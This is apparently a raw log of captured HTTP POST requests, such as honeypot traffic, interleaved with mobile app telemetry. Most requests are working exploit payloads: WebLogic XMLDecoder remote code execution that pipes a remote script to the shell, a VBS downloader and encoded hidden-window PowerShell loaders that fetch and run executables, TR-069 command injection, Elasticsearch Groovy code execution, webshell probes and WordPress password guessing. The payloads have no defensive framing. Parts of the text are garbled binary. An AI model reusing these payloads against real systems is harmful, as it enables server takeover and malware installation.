∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache

Q6APx9PAMd/XJDquZkgfzlM/uE/lLOFtWM7zrfjI7IRIu7KlQ2Gz4rMQDlTwx+/FgtHS3FuAkO0DEHE6ciSaKALSjj6jj4sjKTlaq/qDJToWUwikG6hNu2elBz/vLhPgMOL6Dsv4AG/os0BR/DxprX0a1MqDlrk+OJpylXfkXi98c5KnoUG/vhAv356G/P6G0O6Unfg4/Adgj64vfqUUx2qypicdXHSwHQyHUR6yMIlCm5+JXmOk2z7pj+Ffk4x0i83bZgkOsFD1OFvA0hSL3OSbI3tBHkE9BnJ/4aof2VGDsuF7aAhjJGitNEzU6eCGlKJFiOyjrfjz95n0bB0g2TJHl+lcNrFYA6Ma4A6WU7aEf9zQn/+O2l1tprdAX73kyi5tGQ==

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=146948360897&a=PSCMN&i=2734486398&p=3128 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://t7.proxy-checks.com/favicon.ico HTTP/1.1
Host: t7.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>


POST http://appinfocdn.ksmobile.net/gmi HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 55

7™Ìß—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIeJO™v≈õflˇD‡ßßz ◊

POST http://u.uc123.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: u.uc123.com:80
Connection: Keep-Alive

<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>

POST http://analytics.seattleclouds.com/trackevent.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: analytics.seattleclouds.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 230

screenSize=2&os=1&username=tculang&osVersion=4.4.4&appId=videolaguanak&param=&deviceModel=Xiaomi+MI+4LTE&connectionType=2&uniqueAppId=com.ramlidev.videolaguanak&publisherid=tashlik&type=2&screenDensity=480&deviceId=6ccc52a8048214f

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache

log=admin&pwd=654321

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
GˇuÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î·/Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType HTTP/1.0
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Type: text/xml
Content-Length: 774

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
	<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
		<java version="1.8.0_131" class="java.beans.XMLDecoder">
		  <void class="java.lang.ProcessBuilder">
			<array class="java.lang

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache

log=172&pwd=172444444

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

467267
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

af767e5ea1f2c04d4863eeb1a884f525
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--Me5RgqeHu2UfsSJErTp23fvBfhTIzoNYikDepJBM--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

m=die((string)(111111111*9))

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache

RqJWldKdMOgAjmFX+9/qeKKCpjJd39zQK6S1qSIBHY91aSuXoS/xLr175zSPuC0qbkqeL+N6pNDLtNm6BYNUXmt96BMYFtrCr/EyeQfVgUoHc25HZI++yUMFXIwFF9PXeAAqyFvPNnsM3ktnWQ/MbrY5dxuDXH29Cb/MSx/kqOZPXf+7xllKV0EQBWoL4P/xayCuK171dahDgg2B3GFPBkUCv7uTcHzOM6ACDMU+LaCk8vStIOe1/dVT6VFXSmCsTb7IfXkRhhnf5XM5xqdsU8QDH/Ypw/9XDjrVh1QgRW7Gedlvq8XPKev3ppvgnxxjxLcUFDcYVOc4scvGHLC/ZV4VSXu0HNeki7zWbkEEisTbYMq8pktNkvafe9WmKHQUb9QOg/aY6ALnjeFihING16YHHQys+tMxAfG7q1vAnQ8u

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=17&ac=50&pos=34106&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]

POST http://check.proxyradar.com/azenv.php?auth=149450839181&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /cgi?7 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 128.199.238.30/mainFrame.htm
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
